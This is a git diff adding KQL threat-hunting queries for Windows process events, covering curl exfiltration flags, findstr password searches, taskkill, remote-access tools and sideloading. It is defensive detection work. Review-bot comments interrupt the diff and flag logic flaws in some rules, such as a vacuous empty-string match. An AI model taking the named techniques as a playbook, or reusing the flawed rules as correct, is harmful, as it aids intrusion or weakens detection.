+| where (ProcessCommandLine contains "New-NetFirewallRule " and ProcessCommandLine contains " -Action " and ProcessCommandLine contains "allow") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\powershell_ise.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql
new file mode 100644
index 00000000..1d68187a
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql
@@ -0,0 +1,12 @@
+// Title: Password Protected Compressed File Extraction Via 7Zip
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-10
+// Level: low
+// Description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+// False Positives:
+// - Legitimate activity is expected since extracting files with a password can be common in some environment.
+
+DeviceProcessEvents
+| where (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) and (ProcessCommandLine contains " -p" and ProcessCommandLine contains " x " and ProcessCommandLine contains " -o")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql
new file mode 100644
index 00000000..90bda73f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql
@@ -0,0 +1,13 @@
+// Title: Potential BOINC Software Execution (UC-Berkeley Signature)
+// Author: Matt Anderson (Huntress)
+// Date: 2024-07-23
+// Level: informational
+// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information.
+// This indicates it may be related to BOINC software and can be used maliciously if unauthorized.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting
+// False Positives:
+// - This software can be used for legitimate purposes when installed intentionally.
+
+DeviceProcessEvents
+| where ProcessVersionInfoFileDescription =~ "University of California, Berkeley"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql
new file mode 100644
index 00000000..fc420363
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql
@@ -0,0 +1,11 @@
+// Title: Potential CommandLine Obfuscation Using Unicode Characters
+// Author: frack113, Florian Roth (Nextron Systems)
+// Date: 2022-01-15
+// Level: medium
+// Description: Detects potential CommandLine obfuscation using unicode characters.
+// Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql
new file mode 100644
index 00000000..817fd51c
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql
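Review bot: The eighth `contains` operand in the `| where` line renders as an ordinary space (`" "`); if that literal is really U+0020 rather than the no-break space the rule presumably intends, the clause is true for practically every command line and the rule fires on all process creations. Please verify the byte value of that literal in the generated file, and add a header line such as `// NOTE: the 8th operand is U+00A0 (no-break space), not U+0020` so the distinction survives copy/paste and review. The same verification applies to the other homoglyph literals on that line, which are equally invisible once an editor normalises them.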
@@ -0,0 +1,12 @@
+// Title: Potential Data Exfiltration Via Curl.EXE
+// Author: Florian Roth (Nextron Systems), Cedric MAURUGEON (Update)
+// Date: 2020-07-03
+// Level: medium
+// Description: Detects the execution of the "curl" process with "upload" flags. Which might indicate potential data exfiltration
+// MITRE Tactic: Exfiltration
+// Tags: attack.exfiltration, attack.command-and-control, attack.t1567, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Scripts created by developers and admins
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains " --form" or ProcessCommandLine contains " --upload-file " or ProcessCommandLine contains " --data " or ProcessCommandLine contains " --data-") or ProcessCommandLine matches regex "\\s-[FTd]\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoProductName =~ "The curl executable")) and (not((ProcessCommandLine contains "://localhost" or ProcessCommandLine contains "://127.0.0.1")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql
new file mode 100644
index 00000000..674acdb8
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential DLL Sideloading Activity Via ExtExport.EXE
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-26
+// Level: medium
+// Description: Detects the execution of "Extexport.exe".A utility that is part of the Internet Explorer browser and is used to export and import various settings and data, particularly when switching between Internet Explorer and other web browsers like Firefox. It allows users to transfer bookmarks, browsing history, and other preferences from Internet Explorer to Firefox or vice versa.
+// It can be abused as a tool to side load any DLL. If a folder is provided in the command line it'll load any DLL with one of the following names "mozcrt19.dll", "mozsqlite3.dll", or "sqlite.dll".
+// Arbitrary DLLs can also be loaded if a specific number of flags was provided.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+
+DeviceProcessEvents
+| where FolderPath endswith "\\Extexport.exe" or ProcessVersionInfoOriginalFileName =~ "extexport.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql
new file mode 100644
index 00000000..96fa9c98
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql
@@ -0,0 +1,15 @@
+// Title: Potential File Override/Append Via SET Command
+// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan)
+// Date: 2024-08-22
+// Level: low
+// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign.
+// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly.
+// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt".
+// The typical use case of the "set /p=" command is to prompt the user for input.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting
+// False Positives:
+// - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/c set /p=" or ProcessCommandLine contains "\"set /p=" or (ProcessCommandLine contains ">>" and ProcessCommandLine contains "set /p=")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql
new file mode 100644
index 00000000..da9ac05f
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Password Reconnaissance Via Findstr.EXE
+// Author: Josh Nickels
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects command line usage of "findstr" to search for the "passwords" keyword in a variety of different languages
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "contraseña" or ProcessCommandLine contains "hasło" or ProcessCommandLine contains "heslo" or ProcessCommandLine contains "parola" or ProcessCommandLine contains "passe" or ProcessCommandLine contains "passw" or ProcessCommandLine contains "senha" or ProcessCommandLine contains "senord" or ProcessCommandLine contains "密碼") and (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
new file mode 100644
index 00000000..c7b2aa51
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql
@@ -0,0 +1,15 @@
+// Title: Potential Proxy Execution Via Explorer.EXE From Shell Process
+// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative
+// Date: 2020-10-05
+// Level: low
+// Description: Detects the creation of a child "explorer.exe" process from a shell like process such as "cmd.exe" or "powershell.exe".
+// Attackers can use "explorer.exe" for evading defense mechanisms by proxying the execution through the latter.
+// While this is often a legitimate action, this rule can be use to hunt for anomalies.
+// Muddy Waters threat actor was seeing using this technique.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Legitimate explorer.exe run from a shell host like "cmd.exe" or "powershell.exe"
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "explorer.exe" and FolderPath endswith "\\explorer.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql
new file mode 100644
index 00000000..f05c72fa
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql
@@ -0,0 +1,13 @@
+// Title: Potential Suspicious Execution From GUID Like Folder Names
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: low
+// Description: Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks.
+// Use this rule to hunt for potentially suspicious activity stemming from uncommon folders.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, detection.threat-hunting
+// False Positives:
+// - Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") and (ProcessCommandLine contains "\\{" and ProcessCommandLine contains "}\\")) and (not((FolderPath =~ "C:\\Windows\\System32\\drvinst.exe" or (FolderPath contains "\\{" and FolderPath contains "}\\") or (FolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql
new file mode 100644
index 00000000..8abde06b
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Compression Tool Parameters
+// Author: Florian Roth (Nextron Systems), Samir Bousseaden
+// Date: 2019-10-15
+// Level: medium
+// Description: Detects potentially suspicious command line arguments of common data compression tools
+// MITRE Tactic: Collection
+// Tags: attack.collection, attack.t1560.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -p" or ProcessCommandLine contains " -ta" or ProcessCommandLine contains " -tb" or ProcessCommandLine contains " -sdel" or ProcessCommandLine contains " -dw" or ProcessCommandLine contains " -hp") and ((ProcessVersionInfoOriginalFileName contains "7z" and ProcessVersionInfoOriginalFileName contains ".exe") or ProcessVersionInfoOriginalFileName endswith "rar.exe" or (ProcessVersionInfoOriginalFileName contains "Command" and ProcessVersionInfoOriginalFileName contains "Line" and ProcessVersionInfoOriginalFileName contains "RAR"))) and (not((InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql
new file mode 100644
index 00000000..53be99b2
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql
@@ -0,0 +1,13 @@
+// Title: Potentially Suspicious PowerShell Child Processes
+// Author: Florian Roth (Nextron Systems), Tim Shelton
+// Date: 2022-04-26
+// Level: medium
+// Description: Detects potentially suspicious child processes spawned by PowerShell.
+// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, detection.threat-hunting
+// False Positives:
+// - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts.
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not(((ProcessCommandLine contains "-verifystore " and FolderPath endswith "\\certutil.exe") or ((ProcessCommandLine contains "qfe list" or ProcessCommandLine contains "diskdrive " or ProcessCommandLine contains "csproduct " or ProcessCommandLine contains "computersystem " or ProcessCommandLine contains " os " or ProcessCommandLine startswith "") and FolderPath endswith "\\wmic.exe")))) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program 
Files\\Amazon\\WorkspacesConfig\\Scripts\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql
new file mode 100644
index 00000000..2cc0ed80
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql
@@ -0,0 +1,15 @@
+// Title: Process Execution From WebDAV Share
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-13
+// Level: low
+// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares.
+// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application.
+// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting
+// False Positives:
+// - Legitimate use of WebDAV shares for process execution
+// - Known applications executing from WebDAV paths
+
+DeviceProcessEvents
+| where FolderPath contains "\\DavWWWRoot\\" and FolderPath startswith "\\\\"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql
new file mode 100644
index 00000000..57e847f0
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql
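Review bot: The wmic.exe exclusion inside the first `not(...)` of the `| where` line contains `ProcessCommandLine startswith ""`, which as far as I can tell is true for every non-null command line in Kusto, so every wmic.exe child of PowerShell is excluded outright and the `qfe list`/`diskdrive `/`csproduct `/`computersystem `/` os ` sub-conditions beside it are dead. This reads like a conversion artifact of a Sigma filter on an empty or null CommandLine; `isempty(ProcessCommandLine)` expresses that intent without nullifying the wmic branch of the rule. The `| where` line is wrapped across the previous physical line and this one.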
@@ -0,0 +1,13 @@
+// Title: Process Terminated Via Taskkill
+// Author: frack113, MalGamy (Nextron Systems), Nasreddine Bencherchali
+// Date: 2021-12-26
+// Level: low
+// Description: Detects execution of "taskkill.exe" in order to stop a service or a process. Look for suspicious parents executing this command in order to hunt for potential malicious activity.
+// Attackers might leverage this in order to conduct data destruction or data encrypted for impact on the data stores of services like Exchange and SQL Server.
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1489, detection.threat-hunting
+// False Positives:
+// - Expected FP with some processes using this techniques to terminate one of their processes during installations and updates
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -im " or ProcessCommandLine contains " /im " or ProcessCommandLine contains " –im " or ProcessCommandLine contains " —im " or ProcessCommandLine contains " ―im " or ProcessCommandLine contains " -pid " or ProcessCommandLine contains " /pid " or ProcessCommandLine contains " –pid " or ProcessCommandLine contains " —pid " or ProcessCommandLine contains " ―pid ") and (ProcessCommandLine contains " -f " or ProcessCommandLine contains " /f " or ProcessCommandLine contains " –f " or ProcessCommandLine contains " —f " or ProcessCommandLine contains " ―f " or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " /f" or ProcessCommandLine endswith " –f" or ProcessCommandLine endswith " —f" or ProcessCommandLine endswith " ―f") and (FolderPath endswith "\\taskkill.exe" or ProcessVersionInfoOriginalFileName =~ "taskkill.exe")) and (not(((InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp") and InitiatingProcessFolderPath endswith ".tmp")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
new file mode 100644
index 00000000..0ad02020
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql
@@ -0,0 +1,20 @@
+// Title: Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
+// Author: @kostastsale
+// Date: 2023-04-13
+// Level: medium
+// Description: Detects the execution of Action1 in order to execute arbitrary code or establish a remote session.
+// Action1 is a powerful Remote Monitoring and Management tool that enables users to execute commands, scripts, and binaries.
+// Through the web interface of action1, the administrator must create a new policy or an app to establish remote execution and then points that the agent is installed.
+// Hunting Opportunity 1- Weed Out The Noise
+// When threat actors execute a script, a command, or a binary through these new policies and apps, the names of these become visible in the command line during the execution process. Below is an example of the command line that contains the deployment of a binary through a policy with name "test_app_1":
+// ParentCommandLine: "C:\WINDOWS\Action1\action1_agent.exe schedule:Deploy_App__test_app_1_1681327673425 runaction:0"
+// After establishing a baseline, we can split the command to extract the policy name and group all the policy names and inspect the results with a list of frequency occurrences.
+// Hunting Opportunity 2 - Remote Sessions On Out Of Office Hours
+// If you have admins within your environment using remote sessions to administer endpoints, you can create a threat-hunting query and modify the time of the initiated sessions looking for abnormal activity.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1219.002, detection.threat-hunting
+// False Positives:
+// - If Action1 is among the approved software in your environment, you might find that this is a noisy query. See description for ideas on how to alter this query and start looking for suspicious activities.
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Windows\\Action1\\package_downloads\\" and InitiatingProcessFolderPath endswith "\\action1_agent.exe") or ((InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_Command_" or InitiatingProcessCommandLine contains "\\Action1\\scripts\\Run_PowerShell_") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe")) or FolderPath endswith "\\agent1_remote.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql
new file mode 100644
index 00000000..33864ef7
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Ammy Admin Agent Execution
+// Author: @kostastsale
+// Date: 2024-08-05
+// Level: medium
+// Description: Detects the execution of the Ammy Admin RMM agent for remote management.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Legitimate use of Ammy Admin RMM agent for remote management by admins.
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "AMMYY\\aa_nts.dll\",run" and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
new file mode 100644
index 00000000..e74fe141
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql
@@ -0,0 +1,12 @@
+// Title: Remote Access Tool - Cmd.EXE Execution via AnyViewer
+// Author: @kostastsale
+// Date: 2024-08-03
+// Level: medium
+// Description: Detects execution of "cmd.exe" via the AnyViewer RMM agent on a remote management sessions.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, detection.threat-hunting
+// False Positives:
+// - Legitimate use for admin activity.
+
+DeviceProcessEvents
+| where FolderPath endswith "\\cmd.exe" and InitiatingProcessCommandLine contains "AVCore.exe\" -d" and InitiatingProcessFolderPath endswith "\\AVCore.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
new file mode 100644
index 00000000..e692c9a3
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql
@@ -0,0 +1,13 @@
+// Title: Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-02-23
+// Level: medium
+// Description: Detects remote binary or command execution via the ScreenConnect Service.
+// Use this rule in order to hunt for potentially anomalous executions originating from ScreenConnect
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.threat-hunting
+// False Positives:
+// - Legitimate commands launched from ScreenConnect will also trigger this rule. Look for anomalies.
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ScreenConnect.ClientService.exe"
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
new file mode 100644
index 00000000..55114655
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql
@@ -0,0 +1,13 @@
+// Title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-17
+// Level: medium
+// Description: Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, detection.threat-hunting
+// False Positives:
+// - Legitimate usage as part of application installation, but less likely from e.g. temporary paths.
+// - Not every instance is considered malicious, but this rule will capture the malicious usages.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "DllRegisterServer" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")) and (not((ProcessCommandLine contains ":\\Program Files (x86)" or ProcessCommandLine contains ":\\Program Files\\" or ProcessCommandLine contains ":\\Windows\\System32\\" or ProcessCommandLine contains ":\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql
new file mode 100644
index 00000000..91ba6406
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql
@@ -0,0 +1,13 @@
+// Title: SC.EXE Query Execution
+// Author: frack113
+// Date: 2021-12-06
+// Level: low
+// Description: Detects execution of "sc.exe" to query information about registered services on the system
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1007, detection.threat-hunting
+// False Positives:
+// - Legitimate query of a service by an administrator to get more information such as the state or PID
+// - Keybase process "kbfsdokan.exe" query the dokan1 service with the following commandline "sc query dokan1"
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " query" and (FolderPath endswith "\\sc.exe" and ProcessVersionInfoOriginalFileName =~ "sc.exe")) and (not(ProcessCommandLine =~ "sc query dokan1"))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql
new file mode 100644
index 00000000..c1b8a721
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql
@@ -0,0 +1,13 @@
+// Title: Scheduled Task Creation From Potential Suspicious Parent Location
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-23
+// Level: medium
+// Description: Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
+// Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005, detection.threat-hunting
+// False Positives:
+// - Software installers that run from temporary folders and also install scheduled tasks
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/Create " and FolderPath endswith "\\schtasks.exe" and (InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\AppData\\Roaming\\" or InitiatingProcessFolderPath contains "\\Temporary Internet" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "update_task.xml" or ProcessCommandLine contains "unattended.ini")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql
new file mode 100644
index 00000000..db3b3197
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql
@@ -0,0 +1,10 @@
+// Title: Set Files as System Files Using Attrib.EXE
+// Author: frack113
+// Date: 2022-02-04
+// Level: low
+// Description: Detects the execution of "attrib" with the "+s" flag to mark files as system files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001, detection.threat-hunting
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " +s " and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE")
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql
new file mode 100644
index 00000000..b3f171fb
--- /dev/null
+++ b/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql
@@ -0,0 +1,12 @@
+// Title: SMB over QUIC Via Net.EXE
+// Author: frack113
+// Date: 2023-07-21
+// Level: medium
+// Description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1570, detection.threat-hunting
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/TRANSPORT:QUIC" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql
new file mode 100644
index 00000000..bb118400
--- /dev/null
